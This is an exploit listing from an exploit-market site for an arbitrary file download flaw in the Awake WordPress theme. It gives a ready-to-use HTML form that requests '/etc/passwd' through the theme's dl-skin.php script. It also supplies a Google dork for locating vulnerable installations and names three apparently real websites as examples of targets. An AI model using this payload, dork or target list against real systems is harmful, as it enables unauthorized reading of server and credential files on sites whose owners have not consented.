[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Theme Awake Arbitrary File Download Vulnerability

Author
Aloulou
Risk
[
Security Risk High
]
0day-ID
0day-ID-22359
Category
web applications
Date add
20-06-2014
Platform
php
############################################################################
 
# Title : Wordpress Theme Awake Arbitrary File Download Vulnerability   
 
# Author : Aloulou                                             
 
# Date : 19/06/2014                                                    
 
# Facebook : http://www.facebook.com/Aloulou.TN                               
 
# Email: [email protected]
 
# Vendor : www.wordpress.org                                                     
 
# Google Dork : inurl:/wp-content/themes/awake 
 
# Tested on : Linux
                        
 
 
############################################################################
 

 
Exploit:
 
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/awake/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>



    
 
Examples:
http://glacier-colmar.fr
http://www.allo-facades-devianne.fr
http://www.hirondelle37.fr 
 
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2024-03-28]  #